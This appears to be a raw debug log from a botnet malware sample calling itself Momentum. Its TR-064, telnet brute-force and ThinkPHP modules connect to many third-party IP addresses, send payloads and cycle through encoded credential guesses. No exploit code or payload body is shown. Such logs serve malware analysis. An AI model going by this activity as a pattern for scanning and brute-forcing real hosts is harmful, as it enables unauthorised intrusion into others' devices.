[Tr064] FD30 connected to 217.144.32.43
[Tr064] FD31 connected to 34.183.63.81
[Tr064] FD42 connected to 23.91.39.87
[Tr064] FD65 connected to 71.254.190.14
[Tr064] FD69 connected to 217.63.48.206
[Tr064] FD5 sending payload
[Tr064] FD6 sending payload
[Tr064] FD7 sending payload
[Tr064] FD8 sending payload
[Tr064] FD9 sending payload
[Tr064] FD10 sending payload
[Tr064] FD11 sending payload
[Tr064] FD27 sending payload
[Tr064] FD28 sending payload
[Tr064] FD29 sending payload
[Tr064] FD30 sending payload
[Tr064] FD31 sending payload
[Tr064] FD42 sending payload
[Tr064] FD65 sending payload
[Tr064] FD69 sending payload
[Tr064] FD11 finnished
[Tr064] FD79 connected to 113.16.91.104
[Tr064] FD79 sending payload
[Tr064] FD26 connected to 197.131.140.8
[Tr064] FD26 sending payload
[Tr064] FD32 connected to 167.183.152.2
[Tr064] FD36 connected to 194.122.191.22
[Tr064] FD32 sending payload
[Tr064] FD33 connected to 182.58.1.242
[Tr064] FD34 connected to 219.44.145.4
[Tr064] FD35 connected to 128.254.238.51
[Tr064] FD36 sending payload
[Tr064] FD33 sending payload
[Tr064] FD34 sending payload
[Tr064] FD35 sending payload
[Tr064] FD32 finnished
[Tr064] FD36 finnished
[Tr064] FD35 finnished
[Tr064] FD45 connected to 110.211.19.120
[Tr064] FD43 connected to 118.8.12.219
[Tr064] FD45 sending payload
[Tr064] FD43 sending payload
[Tr064] FD35 finnished
[Tr064] FD56 connected to 46.229.152.199
[Tr064] FD56 sending payload
[Tr064] FD66 connected to 141.151.90.91
[Tr064] FD66 sending payload
[Tr064] FD36 finnished
[Tr064] FD42 finnished
[Tr064] FD69 finnished
[Tr064] FD33 finnished
[Tr064] FD34 finnished
[Tr064] FD32 finnished
[Tr064] FD32 connected to 93.165.93.72
[Tr064] FD33 connected to 90.201.142.122
[Tr064] FD35 finnished
[Tr064] FD32 sending payload
[Tr064] FD33 sending payload
[Tr064] FD37 connected to 199.58.155.75
[Tr064] FD37 sending payload
[Tr064] FD47 connected to 61.64.58.161
[Tr064] FD47 sending payload
[Tr064] FD37 connected to 97.18.162.200
[Tr064] FD37 sending payload
[Tr064] FD57 connected to 75.183.209.41
[Tr064] FD57 sending payload
[Tr064] FD45 finnished
[Tr064] FD67 connected to 183.59.129.150
[Tr064] FD67 sending payload
[Tr064] FD68 connected to 157.4.219.114
[Tr064] FD68 sending payload
[Tr064] FD45 finnished
[Tr064] FD34 connected to 179.27.189.173
[Tr064] FD34 sending payload
[Tr064] FD34 finnished
[Tr064] FD35 finnished
[Tr064] FD43 finnished
[Tr064] FD34 connected to 168.211.82.50
[Tr064] FD37 finnished
[Tr064] FD56 connected to 74.194.189.203
[Tr064] FD47 finnished
[Tr064] FD34 sending payload
[Tr064] FD56 sending payload
[Tr064] FD34 finnished
[Tr064] FD37 finnished
[Tr064] FD35 connected to 160.156.163.195
[Tr064] FD43 connected to 189.205.54.195
[Tr064] FD35 sending payload
[Tr064] FD43 sending payload
[Tr064] FD45 connected to 71.98.72.113
[Tr064] FD37 connected to 67.22.59.136
[Tr064] FD45 sending payload
[Tr064] FD67 connected to 36.189.225.55
[Tr064] FD37 sending payload
[Tr064] FD67 sending payload
[Tr064] FD81 connected to 96.229.242.164
[Tr064] FD81 sending payload
[Tr064] FD32 finnished
[Tr064] FD33 finnished
[Tr064] FD42 connected to 78.196.170.64
[Tr064] FD42 sending payload
[Tr064] FD32 finnished
[Tr064] FD35 finnished
[Tr064] FD43 connected to 9.12.58.202
[Tr064] FD34 finnished
[Tr064] FD47 connected to 101.81.175.90
[Tr064] FD56 connected to 97.176.110.234
[Tr064] FD57 connected to 78.214.249.24
[Tr064] FD66 connected to 46.13.119.10
[Tr064] FD43 sending payload
[Tr064] FD47 sending payload
[Tr064] FD56 sending payload
[Tr064] FD57 sending payload
[Tr064] FD66 sending payload
[Tr064] FD124 connected. Trying :DFG@
[TelnetScanner] FD126 connected. Trying :5
[TelnetScanner] FD129 connected. Trying :%D180
[TelnetScanner] FD33 connection gracefully closed
[TelnetScanner] FD33 lost connection
[TelnetScanner] FD33 retrying with different auth combo!
[TelnetScanner] FD33 connected. Trying :9%1N
[TelnetScanner] FD11 connected. Trying :
[TelnetScanner] FD18 timed out (state = 1)
[TelnetScanner] FD19 timed out (state = 1)
[TelnetScanner] FD20 timed out (state = 1)
[TelnetScanner] FD21 timed out (state = 1)
[TelnetScanner] FD22 timed out (state = 1)
[TelnetScanner] FD23 timed out (state = 1)
[TelnetScanner] FD24 timed out (state = 1)
[TelnetScanner] FD26 timed out (state = 1)
[TelnetScanner] FD27 timed out (state = 1)
[TelnetScanner] FD28 timed out (state = 1)
[TelnetScanner] FD29 timed out (state = 1)
[TelnetScanner] FD30 timed out (state = 1)
[TelnetScanner] FD31 timed out (state = 1)
[TelnetScanner] FD32 timed out (state = 1)
[TelnetScanner] FD35 timed out (state = 1)
[TelnetScanner] FD58 timed out (state = 1)
[TelnetScanner] FD59 timed out (state = 1)
[TelnetScanner] FD61 timed out (state = 1)
[TelnetScanner] FD62 timed out (state = 1)
[TelnetScanner] FD65 timed out (state = 1)
[TelnetScanner] FD66 timed out (state = 1)
[TelnetScanner] FD67 timed out (state = 1)
[TelnetScanner] FD68 timed out (state = 1)
[TelnetScanner] FD69 timed out (state = 1)
[TelnetScanner] FD70 timed out (state = 1)
[TelnetScanner] FD72 timed out (state = 1)
[TelnetScanner] FD75 timed out (state = 1)
[TelnetScanner] FD77 timed out (state = 1)
[TelnetScanner] FD78 timed out (state = 1)
[TelnetScanner] FD79 timed out (state = 1)
[TelnetScanner] FD80 timed out (state = 1)
[TelnetScanner] FD81 timed out (state = 1)
[TelnetScanner] FD82 timed out (state = 1)
[TelnetScanner] FD83 timed out (state = 1)
[TelnetScanner] FD85 timed out (state = 1)
[TelnetScanner] FD86 timed out (state = 1)
[TelnetScanner] FD87 timed out (state = 1)
[TelnetScanner] FD88 timed out (state = 1)
[TelnetScanner] FD90 timed out (state = 1)
[TelnetScanner] FD92 timed out (state = 1)
[TelnetScanner] FD94 timed out (state = 1)
[TelnetScanner] FD95 timed out (state = 1)
[TelnetScanner] FD96 timed out (state = 1)
[TelnetScanner] FD98 timed out (state = 1)
[TelnetScanner] FD99 timed out (state = 1)
[TelnetScanner] FD100 timed out (state = 1)
[TelnetScanner] FD101 timed out (state = 1)
[TelnetScanner] FD103 timed out (state = 1)
[TelnetScanner] FD104 timed out (state = 1)
[TelnetScanner] FD106 timed out (state = 1)
[TelnetScanner] FD107 timed out (state = 1)
[TelnetScanner] FD16 connected. Trying :
[TelnetScanner] FD18 Attempting to brute found IP 219.80.161.165
[TelnetScanner] FD18 connected. Trying :GDEBC@
[TelnetScanner] FD33 connection gracefully closed
[TelnetScanner] FD33 lost connection
[TelnetScanner] FD19 retrying with different auth combo!
[TelnetScanner] FD11 connection gracefully closed
[TelnetScanner] FD11 lost connection
[TelnetScanner] FD11 retrying with different auth combo!
[TelnetScanner] FD11 connected. Trying :5
[TelnetScanner] FD16 connection gracefully closed
[TelnetScanner] FD16 lost connection
[TelnetScanner] FD16 retrying with different auth combo!
[TelnetScanner] FD16 connected. Trying :%D180
[TelnetScanner] FD60 connection gracefully closed
[TelnetScanner] FD60 lost connection
[TelnetScanner] FD20 retrying with different auth combo!
[TelnetScanner] FD20 connected. Trying :
[TelnetScanner] FD11 connection gracefully closed
[TelnetScanner] FD11 lost connection
[TelnetScanner] FD11 retrying with different auth combo!
[TelnetScanner] FD21 Attempting to brute found IP 68.195.246.85
[TelnetScanner] FD22 Attempting to brute found IP 9.21.82.9
[TelnetScanner] FD23 Attempting to brute found IP 44.129.116.7
[TelnetScanner] FD24 Attempting to brute found IP 13.83.191.8
[TelnetScanner] FD26 Attempting to brute found IP 129.187.83.195
[TelnetScanner] FD27 Attempting to brute found IP 120.27.80.146
[TelnetScanner] FD28 Attempting to brute found IP 67.174.227.147
[TelnetScanner] FD29 Attempting to brute found IP 173.96.26.27
[TelnetScanner] FD30 Attempting to brute found IP 77.132.155.159
[TelnetScanner] FD31 Attempting to brute found IP 91.85.210.185
[TelnetScanner] FD32 Attempting to brute found IP 174.118.190.170
[TelnetScanner] FD33 Attempting to brute found IP 109.233.58.123
[TelnetScanner] FD35 Attempting to brute found IP 89.249.149.197
[TelnetScanner] FD58 Attempting to brute found IP 23.127.24.182
[TelnetScanner] FD59 Attempting to brute found IP 158.85.193.241
[TelnetScanner] FD60 Attempting to brute found IP 202.2.193.133
[TelnetScanner] FD61 Attempting to brute found IP 17.91.250.69
[TelnetScanner] FD62 Attempting to brute found IP 188.30.250.155
[TelnetScanner] FD65 Attempting to brute found IP 199.200.190.6
[TelnetScanner] FD66 Attempting to brute found IP 138.141.7.68
[TelnetScanner] FD67 Attempting to brute found IP 135.146.5.58
[TelnetScanner] FD68 Attempting to brute found IP 180.35.135.89
[TelnetScanner] FD69 Attempting to brute found IP 102.8.150.21
[TelnetScanner] FD70 Attempting to brute found IP 203.247.117.24
[TelnetScanner] FD72 Attempting to brute found IP 183.192.44.164
[TelnetScanner] FD75 Attempting to brute found IP 140.57.175.164
[TelnetScanner] FD77 Attempting to brute found IP 187.226.237.231
[TelnetScanner] FD78 Attempting to brute found IP 187.111.144.112
[TelnetScanner] FD79 Attempting to brute found IP 130.138.248.115
[TelnetScanner] FD80 Attempting to brute found IP 168.38.237.141
[TelnetScanner] FD81 Attempting to brute found IP 74.80.40.122
[TelnetScanner] FD82 Attempting to brute found IP 48.83.51.227
[TelnetScanner] FD83 Attempting to brute found IP 179.96.15.252
[TelnetScanner] FD85 Attempting to brute found IP 110.172.236.88
[TelnetScanner] FD86 Attempting to brute found IP 14.12.159.69
[TelnetScanner] FD87 Attempting to brute found IP 145.19.60.17
[TelnetScanner] FD88 Attempting to brute found IP 184.238.80.45
[TelnetScanner] FD90 Attempting to brute found IP 85.213.89.35
[TelnetScanner] FD92 Attempting to brute found IP 95.149.119.128
[TelnetScanner] FD94 Attempting to brute found IP 86.99.17.231
[TelnetScanner] FD95 Attempting to brute found IP 102.238.86.137
[TelnetScanner] FD96 Attempting to brute found IP 37.204.39.10
[TelnetScanner] FD98 Attempting to brute found IP 156.142.177.155
[TelnetScanner] FD99 Attempting to brute found IP 202.238.168.210
[TelnetScanner] FD100 Attempting to brute found IP 82.43.187.209
[TelnetScanner] FD101 Attempting to brute found IP 157.149.97.15
[TelnetScanner] FD103 Attempting to brute found IP 77.243.227.41
[TelnetScanner] FD104 Attempting to brute found IP 96.67.141.122
[TelnetScanner] FD106 Attempting to brute found IP 42.141.100.70
[TelnetScanner] FD107 Attempting to brute found IP 82.167.32.255
[TelnetScanner] FD11 connected. Trying :
[TelnetScanner] FD21 connected. Trying :%D180
[TelnetScanner] FD22 connected. Trying :DFGC
[TelnetScanner] FD23 connected. Trying :9%1N
[TelnetScanner] FD24 connected. Trying :
[TelnetScanner] FD26 connected. Trying :GDEBC@
[TelnetScanner] FD27 connected. Trying :GFDO
[TelnetScanner] FD28 connected. Trying :
[TelnetScanner] FD59 connected. Trying :
[TelnetScanner] FD72 connected. Trying :
[TelnetScanner] FD94 connected. Trying :
[TelnetScanner] FD107 connected. Trying :, %?&
[TelnetScanner] FD16 connection gracefully closed
[TelnetScanner] FD16 lost connection
[TelnetScanner] FD16 retrying with different auth combo!
[TelnetScanner] FD16 connected. Trying :<@
[TelnetScanner] FD11 connection gracefully closed
[TelnetScanner] FD11 lost connection
[TelnetScanner] FD11 retrying with different auth combo!
[TelnetScanner] FD11 connected. Trying :
[TelnetScanner] FD16 connection gracefully closed
[TelnetScanner] FD16 lost connection
[TelnetScanner] FD16 retrying with different auth combo!
[TelnetScanner] FD108 timed out (state = 1)
[TelnetScanner] FD111 timed out (state = 1)
[TelnetScanner] FD122 timed out (state = 1)
[TelnetScanner] FD125 timed out (state = 1)
[TelnetScanner] FD127 timed out (state = 1)
[TelnetScanner] FD16 connected. Trying :GDE
[TelnetScanner] FD75 connected. Trying :
[TelnetScanner] FD77 connected. Trying :
[TelnetScanner] FD108 Attempting to brute found IP 66.185.77.174
[TelnetScanner] FD111 Attempting to brute found IP 175.222.72.8
[TelnetScanner] FD122 Attempting to brute found IP 4.141.97.68
[TelnetScanner] FD125 Attempting to brute found IP 63.91.118.9
[TelnetScanner] FD127 Attempting to brute found IP 86.223.88.154
[TelnetScanner] FD65 connected. Trying :
[TelnetScanner] FD67 connected. Trying :
[TelnetScanner] FD70 connected. Trying :, %?&
[TelnetScanner] FD99 connected. Trying :%D180
[TelnetScanner] FD104 connected. Trying :
[TelnetScanner] FD106 connected. Trying :
[TelnetScanner] FD11 connection gracefully closed
[TelnetScanner] FD11 lost connection
[TelnetScanner] FD11 retrying with different auth combo!
[TelnetScanner] FD17 connection gracefully closed
[TelnetScanner] FD17 lost connection
[TelnetScanner] FD17 retrying with different auth combo!
[TelnetScanner] FD12 connection gracefully closed
[TelnetScanner] FD12 lost connection
[TelnetScanner] FD12 retrying with different auth combo!
[TelnetScanner] FD15 connection gracefully closed
[TelnetScanner] FD15 lost connection
[TelnetScanner] FD15 retrying with different auth combo!
[TelnetScanner] FD17 connected. Trying :
[TelnetScanner] FD12 connected. Trying :
[TelnetScanner] FD15 connected. Trying :GDE
[TelnetScanner] FD13 connection gracefully closed
[TelnetScanner] FD13 lost connection
[TelnetScanner] FD13 retrying with different auth combo!
[TelnetScanner] FD14 connection gracefully closed
[TelnetScanner] FD14 lost connection
[TelnetScanner] FD14 retrying with different auth combo!
[TelnetScanner] FD13 connected. Trying :
[TelnetScanner] FD14 connected. Trying ECFF:
[TelnetScanner] FD25 connection gracefully closed
[TelnetScanner] FD25 lost connection
[TelnetScanner] FD25 retrying with different auth combo!
[TelnetScanner] FD25 connected. Trying :
[TelnetScanner] FD36 connection gracefully closed
[TelnetScanner] FD36 lost connection
[TelnetScanner] FD36 retrying with different auth combo!
[TelnetScanner] FD36 connected. Trying :A;F
[TelnetScanner] FD37 connection gracefully closed
[TelnetScanner] FD37 lost connection
[TelnetScanner] FD37 retrying with different auth combo!
[TelnetScanner] FD41 connection gracefully closed
[TelnetScanner] FD41 lost connection
[TelnetScanner] FD41 retrying with different auth combo!
[TelnetScanner] FD38 connection gracefully closed
[TelnetScanner] FD38 lost connection
[TelnetScanner] FD38 retrying with different auth combo!
[TelnetScanner] FD37 connected. Trying :
[TelnetScanner] FD41 connected. Trying :ECGG
[TelnetScanner] FD16 connection gracefully closed
[TelnetScanner] FD16 lost connection
[TelnetScanner] FD16 retrying with different auth combo!
[TelnetScanner] FD44 connection gracefully closed
[TelnetScanner] FD44 lost connection
[TelnetScanner] FD44 retrying with different auth combo!
[TelnetScanner] FD38 connected. Trying :<@
[TelnetScanner] FD39 connection gracefully closed
[TelnetScanner] FD39 lost connection
[TelnetScanner] FD39 retrying with different auth combo!
[TelnetScanner] FD42 connection gracefully closed
[TelnetScanner] FD42 lost connection
[TelnetScanner] FD42 retrying with different auth combo!
[TelnetScanner] FD16 connected. Trying :DFGC
[TelnetScanner] FD44 connected. Trying :
[TelnetScanner] FD40 connection gracefully closed
[TelnetScanner] FD40 lost connection
[TelnetScanner] FD40 retrying with different auth combo!
[TelnetScanner] FD39 connected. Trying :
[TelnetScanner] FD45 connection gracefully closed
[TelnetScanner] FD45 lost connection
[TelnetScanner] FD45 retrying with different auth combo!
[TelnetScanner] FD42 connected. Trying :ECGN
[TelnetScanner] FD46 connection gracefully closed
[TelnetScanner] FD46 lost connection
[TelnetScanner] FD46 retrying with different auth combo!
[TelnetScanner] FD40 connected. Trying :A;F
[TelnetScanner] FD45 connected. Trying :9%1N
[TelnetScanner] FD46 connected. Trying :C
[TelnetScanner] FD43 connection gracefully closed
[TelnetScanner] FD43 lost connection
[TelnetScanner] FD43 retrying with different auth combo!
[TelnetScanner] FD43 connected. Trying :DFGD
[TelnetScanner] FD50 connection gracefully closed
[TelnetScanner] FD50 lost connection
[TelnetScanner] FD50 retrying with different auth combo!
[TelnetScanner] FD50 connected. Trying :DFG@
[TelnetScanner] FD55 connection gracefully closed
[TelnetScanner] FD55 lost connection
[TelnetScanner] FD55 retrying with different auth combo!
[TelnetScanner] FD76 connection gracefully closed
[TelnetScanner] FD76 lost connection
[TelnetScanner] FD76 retrying with different auth combo!
[TelnetScanner] FD55 connected. Trying :5
[TelnetScanner] FD76 connected. Trying :
[TelnetScanner] FD63 connection gracefully closed
[TelnetScanner] FD63 lost connection
[TelnetScanner] FD63 retrying with different auth combo!
[TelnetScanner] FD71 connection gracefully closed
[TelnetScanner] FD71 lost connection
[TelnetScanner] FD71 retrying with different auth combo!
[TelnetScanner] FD63 connected. Trying :DFGB
[TelnetScanner] FD71 connected. Trying :
[TelnetScanner] FD84 connection gracefully closed
[TelnetScanner] FD84 lost connection
[TelnetScanner] FD84 retrying with different auth combo!
[TelnetScanner] FD84 connected. Trying :C
[TelnetScanner] FD89 connection gracefully closed
[TelnetScanner] FD89 lost connection
[TelnetScanner] FD89 retrying with different auth combo!
[TelnetScanner] FD89 connected. Trying :<@
[TelnetScanner] FD97 connection gracefully closed
[TelnetScanner] FD97 lost connection
[TelnetScanner] FD97 retrying with different auth combo!
[TelnetScanner] FD102 connection gracefully closed
[TelnetScanner] FD102 lost connection
[TelnetScanner] FD102 retrying with different auth combo!
[TelnetScanner] FD97 connected. Trying :DFGB
[TelnetScanner] FD102 connected. Trying :, %?&
[TelnetScanner] FD99 connection gracefully closed
[TelnetScanner] FD99 lost connection
[TelnetScanner] FD99 retrying with different auth combo!
[TelnetScanner] FD99 connected. Trying :
[TelnetScanner] FD108 connected. Trying :
[TelnetScanner] FD111 connected. Trying :
[TelnetScanner] FD122 connected. Trying :ECGG
[TelnetScanner] FD125 connected. Trying :5
[TelnetScanner] FD127 connected. Trying :
[TelnetScanner] FD16 connection gracefully closed
[TelnetScanner] FD16 lost connection
[TelnetScanner] FD16 retrying with different auth combo!
[TelnetScanner] FD16 connected. Trying :DFGB
[TelnetScanner] FD19 connected. Trying :1;NGND
[TelnetScanner] FD11 connected. Trying :1;NGND
[TelnetScanner] FD8 connection gracefully closed
[TelnetScanner] FD8 lost connection
[TelnetScanner] FD8 retrying with different auth combo!
[TelnetScanner] FD8 connected. Trying :C
[TelnetScanner] FD34 connection gracefully closed
[TelnetScanner] FD34 lost connection
[TelnetScanner] FD34 retrying with different auth combo!
[TelnetScanner] FD34 connected. Trying :
[TelnetScanner] FD49 connection gracefully closed
[TelnetScanner] FD49 lost connection
[TelnetScanner] FD49 retrying with different auth combo!
[TelnetScanner] FD47 connection gracefully closed
[TelnetScanner] FD47 lost connection
[TelnetScanner] FD47 retrying with different auth combo!
[TelnetScanner] FD48 connection gracefully closed
[TelnetScanner] FD48 lost connection
[TelnetScanner] FD48 retrying with different auth combo!
[TelnetScanner] FD51 connection gracefully closed
[TelnetScanner] FD51 lost connection
[TelnetScanner] FD51 retrying with different auth combo!
[TelnetScanner] FD54 connection gracefully closed
[TelnetScanner] FD54 lost connection
[TelnetScanner] FD54 retrying with different auth combo!
[TelnetScanner] FD53 connection gracefully closed
[TelnetScanner] FD53 lost connection
[TelnetScanner] FD53 retrying with different auth combo!
[TelnetScanner] FD47 connected. Trying :
[TelnetScanner] FD48 connected. Trying :%D180
[TelnetScanner] FD49 connected. Trying :
[TelnetScanner] FD51 connected. Trying :A;F
[TelnetScanner] FD54 connected. Trying :DFG@
[TelnetScanner] FD53 connected. Trying :GDE
[TelnetScanner] FD52 connection gracefully closed
[TelnetScanner] FD52 lost connection
[TelnetScanner] FD52 retrying with different auth combo!
[TelnetScanner] FD52 connected. Trying :1;NGND
[TelnetScanner] FD91 connection gracefully closed
[TelnetScanner] FD91 lost connection
[TelnetScanner] FD91 retrying with different auth combo!
[TelnetScanner] FD91 connected. Trying :GDEBC@
[TelnetScanner] FD105 connection gracefully closed
[TelnetScanner] FD105 lost connection
[TelnetScanner] FD105 retrying with different auth combo!
[TelnetScanner] FD105 connected. Trying ECFF:
[TelnetScanner] FD19 connection gracefully closed
[TelnetScanner] FD19 lost connection
[TelnetScanner] FD19 retrying with different auth combo!
[TelnetScanner] FD19 connected. Trying :9%1N
[TelnetScanner] FD16 connection gracefully closed
[TelnetScanner] FD16 lost connection
[TelnetScanner] FD16 retrying with different auth combo!
[TelnetScanner] FD16 connected. Trying :DFGD
[TelnetScanner] FD11 connection gracefully closed
[TelnetScanner] FD11 lost connection
[TelnetScanner] FD11 retrying with different auth combo!
[TelnetScanner] FD11 connected. Trying :DFGB
[TelnetScanner] FD20 connection gracefully closed
[TelnetScanner] FD20 lost connection
[TelnetScanner] FD20 retrying with different auth combo!
[TelnetScanner] FD20 connected. Trying :GDE
[TelnetScanner] FD29 connected. Trying :C
[TelnetScanner] FD30 connected. Trying :
[TelnetScanner] FD78 connected. Trying :
[TelnetScanner] FD79 connected. Trying :C
[TelnetScanner] FD80 connected. Trying :ECGG
[TelnetScanner] FD19 connection gracefully closed
[TelnetScanner] FD19 lost connection
[TelnetScanner] FD19 retrying with different auth combo!
[TelnetScanner] FD16 connection gracefully closed
[TelnetScanner] FD16 lost connection
[TelnetScanner] FD16 retrying with different auth combo!
[TelnetScanner] FD16 connected. Trying ECFF:
[TelnetScanner] FD109 connection gracefully closed
[TelnetScanner] FD109 lost connection
[TelnetScanner] FD109 retrying with different auth combo!
[TelnetScanner] FD109 connected. Trying :A;F
[TelnetScanner] FD110 connection gracefully closed
[TelnetScanner] FD110 lost connection
[TelnetScanner] FD110 retrying with different auth combo!
[TelnetScanner] FD110 connected. Trying :
[TelnetScanner] FD11 connection gracefully closed
[TelnetScanner] FD11 lost connection
[TelnetScanner] FD11 retrying with different auth combo!
[TelnetScanner] FD11 connected. Trying :1;NGND
[TelnetScanner] FD115 connection gracefully closed
[TelnetScanner] FD115 lost connection
[TelnetScanner] FD115 retrying with different auth combo!
[TelnetScanner] FD115 connected. Trying :
[TelnetScanner] FD116 connection gracefully closed
[TelnetScanner] FD116 lost connection
[TelnetScanner] FD116 retrying with different auth combo!
[TelnetScanner] FD116 connected. Trying :ECGG
[TelnetScanner] FD117 connection gracefully closed
[TelnetScanner] FD117 lost connection
[TelnetScanner] FD117 retrying with different auth combo!
[TelnetScanner] FD117 connected. Trying :
[TelnetScanner] FD120 connection gracefully closed
[TelnetScanner] FD120 lost connection
[TelnetScanner] FD120 retrying with different auth combo!
[TelnetScanner] FD120 connected. Trying :
[TelnetScanner] FD118 connection gracefully closed
[TelnetScanner] FD118 lost connection
[TelnetScanner] FD118 retrying with different auth combo!
[TelnetScanner] FD119 connection gracefully closed
[TelnetScanner] FD119 lost connection
[TelnetScanner] FD119 retrying with different auth combo!
[TelnetScanner] FD118 connected. Trying :
[TelnetScanner] FD119 connected. Trying :ECGG
[TelnetScanner] FD123 connection gracefully closed
[TelnetScanner] FD123 lost connection
[TelnetScanner] FD123 retrying with different auth combo!
[TelnetScanner] FD123 connected. Trying :<@
[TelnetScanner] FD128 connection gracefully closed
[TelnetScanner] FD128 lost connection
[TelnetScanner] FD128 retrying with different auth combo!
[TelnetScanner] FD128 connected. Trying :ECGN
[TelnetScanner] FD99 connection gracefully closed
[TelnetScanner] FD99 lost connection
[TelnetScanner] FD99 retrying with different auth combo!
[TelnetScanner] FD99 connected. Trying :9%1N
[TelnetScanner] FD132 connection gracefully closed
[TelnetScanner] FD132 lost connection
[TelnetScanner] FD132 retrying with different auth combo!
[TelnetScanner] FD132 connected. Trying :9%1N
[TelnetScanner] FD16 connection gracefully closed
[TelnetScanner] FD16 lost connection
[TelnetScanner] FD16 retrying with different auth combo!
[TelnetScanner] FD16 connected. Trying :DFGE
[TelnetScanner] FD11 connection gracefully closed
[TelnetScanner] FD11 lost connection
[TelnetScanner] FD11 retrying with different auth combo!
[TelnetScanner] FD11 connected. Trying :
[TelnetScanner] FD9 connection gracefully closed
[TelnetScanner] FD9 lost connection
[TelnetScanner] FD9 retrying with different auth combo!
[TelnetScanner] FD7 connection gracefully closed
[TelnetScanner] FD7 lost connection
[TelnetScanner] FD7 retrying with different auth combo!
[TelnetScanner] FD5 connection gracefully closed
[TelnetScanner] FD5 lost connection
[TelnetScanner] FD5 retrying with different auth combo!
[TelnetScanner] FD10 connection gracefully closed
[TelnetScanner] FD10 lost connection
[TelnetScanner] FD10 retrying with different auth combo!
[TelnetScanner] FD6 connection gracefully closed
[TelnetScanner] FD6 lost connection
[TelnetScanner] FD6 retrying with different auth combo!
[TelnetScanner] FD6 connected. Trying :C
[TelnetScanner] FD112 connection gracefully closed
[TelnetScanner] FD112 lost connection
[TelnetScanner] FD112 retrying with different auth combo!
[TelnetScanner] FD112 connected. Trying :1;NGND
[TelnetScanner] FD99 connection gracefully closed
[TelnetScanner] FD99 lost connection
[TelnetScanner] FD99 retrying with different auth combo!
[TelnetScanner] FD113 connection gracefully closed
[TelnetScanner] FD113 lost connection
[TelnetScanner] FD113 retrying with different auth combo!
[TelnetScanner] FD99 connected. Trying :
[TelnetScanner] FD113 connected. Trying :DFG@
[TelnetScanner] FD64 connection gracefully closed
[TelnetScanner] FD64 lost connection
[TelnetScanner] FD64 retrying with different auth combo!
[TelnetScanner] FD64 connected. Trying :
[TelnetScanner] FD56 connection gracefully closed
[TelnetScanner] FD56 lost connection
[TelnetScanner] FD56 retrying with different auth combo!
[TelnetScanner] FD57 connection gracefully closed
[TelnetScanner] FD57 lost connection
[TelnetScanner] FD57 retrying with different auth combo!
[TelnetScanner] FD56 connected. Trying :%D180
[TelnetScanner] FD57 connected. Trying :
[TelnetScanner] FD74 connection gracefully closed
[TelnetScanner] FD74 lost connection
[TelnetScanner] FD74 retrying with different auth combo!
[TelnetScanner] FD74 connected. Trying :GDE
[TelnetScanner] FD73 connection gracefully closed
[TelnetScanner] FD73 lost connection
[TelnetScanner] FD73 retrying with different auth combo!
[TelnetScanner] FD73 connected. Trying :
[TelnetScanner] FD93 connection gracefully closed
[TelnetScanner] FD93 lost connection
[TelnetScanner] FD93 retrying with different auth combo!
[TelnetScanner] FD11 connection gracefully closed
[TelnetScanner] FD11 lost connection
[TelnetScanner] FD11 retrying with different auth combo!
[TelnetScanner] FD93 connected. Trying :DFGC
[TelnetScanner] FD11 connected. Trying :
[TelnetScanner] FD16 connection gracefully closed
[TelnetScanner] FD16 lost connection
[TelnetScanner] FD16 retrying with different auth combo!
Momentum Debugging Mode
[main] We are the only process on this system!
[ThinkPHPRep] ThinkPHPRep process initialized. scanning started.
[ThinkPHPRep] FD6 connected to 112.154.178.250
[ThinkPHPRep] FD9 connected to 112.196.115.69
[ThinkPHPRep] FD17 connected to 112.62.184.59
[ThinkPHPRep] FD21 connected to 112.76.5.208
[ThinkPHPRep] FD31 connected to 112.8.205.244
[ThinkPHPRep] FD40 connected to 112.83.245.232
[ThinkPHPRep] FD45 connected to 112.243.149.217
[ThinkPHPRep] FD49 connected to 112.114.206.121
[ThinkPHPRep] FD54 connected to 112.241.239.178
[ThinkPHPRep] FD58 connected to 112.73.190.135
[ThinkPHPRep] FD64 connected to 112.159.194.41
[ThinkPHPRep] FD68 connected to 112.181.239.74
[ThinkPHPRep] FD6 sending payload
[ThinkPHPRep] FD9 sending payload
[ThinkPHPRep] FD17 sending payload
[ThinkPHPRep] FD21 sending payload
[ThinkPHPRep] FD31 sending payload
[ThinkPHPRep] FD40 sending payload
[ThinkPHPRep] FD45 sending payload
[ThinkPHPRep] FD49 sending payload
[ThinkPHPRep] FD54 sending payload
[ThinkPHPRep] FD58 sending payload
[ThinkPHPRep] FD64 sending payload
[ThinkPHPRep] FD68 sending payload
[ThinkPHPRep] FD6 finnished
[ThinkPHPRep] FD40 finnished
[ThinkPHPRep] FD45 finnished
[ThinkPHPRep] FD54 finnished
[ThinkPHPRep] FD58 finnished
[ThinkPHPRep] FD64 finnished
[ThinkPHPRep] FD68 finnished
[ThinkPHPRep] FD8 connected to 112.192.42.89
[ThinkPHPRep] FD12 connected to 112.106.192.86
[ThinkPHPRep] FD13 connected to 112.255.117.3
[ThinkPHPRep] FD14 connected to 112.170.138.218
[ThinkPHPRep] FD5 connected to 112.114.211.99
[ThinkPHPRep] FD7 connected to 112.79.142.149
[ThinkPHPRep] FD8 sending payload
[ThinkPHPRep] FD10 connected to 112.69.147.112
[ThinkPHPRep] FD11 connected to 112.146.81.189
[ThinkPHPRep] FD12 sending payload
[ThinkPHPRep] FD13 sending payload
[ThinkPHPRep] FD14 sending payload
[ThinkPHPRep] FD15 connected to 112.10.98.127
[ThinkPHPRep] FD16 connected to 112.57.86.217
[ThinkPHPRep] FD5 sending payload
[ThinkPHPRep] FD7 sending payload
[ThinkPHPRep] FD10 sending payload
[ThinkPHPRep] FD11 sending payload
[ThinkPHPRep] FD15 sending payload
[ThinkPHPRep] FD16 sending payload
[ThinkPHPRep] FD11 finnished
[ThinkPHPRep] FD47 connected to 112.178.200.174
[ThinkPHPRep] FD47 sending payload
[ThinkPHPRep] FD11 finnished
[ThinkPHPRep] FD61 connected to 112.22.69.217
[ThinkPHPRep] FD62 connected to 112.38.234.232
[ThinkPHPRep] FD61 sending payload
[ThinkPHPRep] FD62 sending payload
[ThinkPHPRep] FD11 finnished
[ThinkPHPRep] FD66 connected to 112.58.59.247
[ThinkPHPRep] FD69 connected to 112.15.53.45
[ThinkPHPRep] FD66 sending payload
[ThinkPHPRep] FD69 sending payload
[ThinkPHPRep] FD65 connected to 112.112.214.186
[ThinkPHPRep] FD65 sending payload
[ThinkPHPRep] FD11 finnished
[ThinkPHPRep] FD31 finnished
[ThinkPHPRep] FD49 finnished
[ThinkPHPRep] FD40 finnished
[ThinkPHPRep] FD45 finnished
[ThinkPHPRep] FD47 finnished
[ThinkPHPRep] FD11 connected to 95.199.55.202
